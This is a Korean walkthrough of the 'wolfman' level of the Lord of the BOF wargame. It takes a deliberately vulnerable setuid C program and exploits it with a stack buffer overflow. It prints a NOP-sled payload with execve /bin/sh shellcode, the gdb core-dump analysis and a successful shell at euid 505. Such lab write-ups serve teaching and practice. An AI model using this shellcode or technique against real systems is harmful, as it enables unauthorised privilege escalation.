/*1. Bash2 실행*/
[orc@localhost orc]$ bash2
/*2. 소스를 봅시다*/
[orc@localhost orc]$ cat wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
/* NOTE(review): original challenge source, kept verbatim. Implicit-int main and
   the missing <string.h> for strcpy/memset/strlen only build on the old
   compiler of the LOB image. The overflow below is the intended vulnerability
   of the level, not a bug to fix. */
char buffer[40];	/* 40-byte stack buffer; strcpy() below does not bound the copy */
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
// Zero every environment string so shellcode cannot be staged in an
// environment variable (the classic "egg") and returned into.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
// On this binary argv[1][44..47] lands on main's saved return address (the
// core dump below stops at eip = 0xbf909090, i.e. bytes \x90\x90\x90\xbf).
// Requiring byte 47 == 0xbf pins the overwritten return address into the
// 0xbfxxxxxx stack range, so returning into libc (0x40xxxxxx) or the binary
// (0x0804xxxx) is ruled out.
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// Intended vulnerability: unbounded copy of argv[1] into buffer[40].
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
// Zero the 40-byte buffer (with 0x00, not the value 40) after use, so any
// shellcode placed in the first 40 bytes is gone before main returns. The
// payload must therefore sit past the return address, e.g. further inside
// the argv[1] string itself, which is where the write-up returns into.
memset(buffer, 0, 40);
}
/*여기서, 버퍼는 사용할 수 없다는 것을 알게됩니다 (buffer는 memset으로 지워지고 환경변수도 전부 0으로 덮이므로). 그래서 쉘코드를 리턴 주소(argv[1]의 44~47번째 바이트) 뒤쪽에 두는 식으로 대충 페이로드를 짜서 넣어봅니다. 아래의 wolvman은 코어 덤프를 얻기 위해 wolfman을 복사해 둔 (setuid가 아닌) 사본으로 보입니다 — 원본 setuid 바이너리는 보통 코어를 남기지 않습니다.*/
[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x47, "\xbf", "\x90"x16,"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
???????????????????????????????????????????????퓧???????????????j
X?Rh//shh/bin??S?訴
Segmentation fault (core dumped) //코어 덤프☆를 주니까 까봅시다.
/*3. gdb -q(환영메세지 없애기) '프로그램 이름' 'core'. 아래의 #0 0xbf909090 은 리틀엔디언으로 \x90\x90\x90\xbf, 즉 페이로드의 44~47번째 바이트가 main의 리턴 주소를 덮었다는 뜻입니다. 스택 덤프에서 argc=2 뒤에 오는 argv[0]=0xbffffc13, argv[1]=0xbffffc1d 를 따라가면 argv[1] 문자열이 0xbffffc1d에서 시작하는 것이 보이고, 여기를 기준으로 쉘코드 주소를 계산합니다.*/
[orc@localhost orc]$ gdb -q wolvman core
Core was generated by `./wolvman ???????????????????????????????????????????????퓧???????????????j
X?R'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbf909090 in ?? ()
(gdb) x/50wx $esp
0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae0: 0x99580b6a 0x2f2f6852 0x2f686873 0x896e6962
0xbffffaf0: 0x895352e3 0x0080cde1 0xbffffb14 0x08048390
0xbffffb00: 0x0804861c 0x4000ae60 0xbffffb0c 0x40013e90
0xbffffb10: 0x00000002 0xbffffc13 0xbffffc1d 0x00000000
0xbffffb20: 0xbffffc75 0xbffffc83 0xbffffc9a 0xbffffcb9
0xbffffb30: 0xbffffcdb 0xbffffce4 0xbffffea7 0xbffffec6
0xbffffb40: 0xbffffedf 0xbffffef4 0xbfffff0f 0xbfffff1a
0xbffffb50: 0xbfffff32 0xbfffff3e 0xbfffff46 0xbfffff50
0xbffffb60: 0xbfffff60 0xbfffff6e 0xbfffff7c 0xbfffff8d
0xbffffb70: 0xbfffff98 0xbfffffa7 0xbfffffe6 0x00000000
0xbffffb80: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffb90: 0x00000005 0x00000006
(gdb)
0xbffffb98: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffba8: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffbb8: 0x0000000b 0x000001f8 0x0000000c 0x000001f8
0xbffffbc8: 0x0000000d 0x000001f8 0x0000000e 0x000001f8
0xbffffbd8: 0x00000010 0x0febfbff 0x0000000f 0xbffffc0e
0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc08: 0x00000000 0x36690000 0x2e003638 0x6c6f772f
0xbffffc18: 0x6e616d76 0x90909000 0x90909090 0x90909090
0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc48: 0x90909090 0x909090bf 0x90909090 0x90909090
0xbffffc58: 0x90909090 0x580b6a90
(gdb) quit
/*제가 이 문제를 풀었을때는 쉘코드가 0xbffffc37지점에 있었는데 말이죠..;;....... 위 덤프대로라면 argv[1]은 0xbffffc1d에서 시작하고 쉘코드(\x6a\x0b\x58...)는 그로부터 64바이트 뒤인 0xbffffc5d에 있습니다. 그래도 0xbffffc37은 쉘코드 앞의 NOP 썰매(\x90) 안에 떨어지므로 상관없습니다. 중간에 끼어 있는 \xbf 한 바이트는 `mov edi, imm32`로 디코딩되어 뒤따르는 NOP 4개를 피연산자로 삼키기만 하므로 실행 흐름은 그대로 쉘코드까지 미끄러져 갑니다. (페이로드 길이가 달라지면 argv 위치도 몇 바이트 밀릴 수 있어서 NOP 썰매를 넉넉히 두는 것입니다.)
암튼 공격해봤습니다.*/
[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'`
????????????????????????????????????????????7?퓧???????????????j
X?Rh//shh/bin??S?訴?????????????????????
bash$ exit //잘되네여
exit
[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'`
????????????????????????????????????????????7?퓧???????????????j
X?Rh//shh/bin??S?訴?????????????????????
bash$ my-pass
euid = 505 //땋
이번엔.. 쉽게풀었네요ㅋㅋ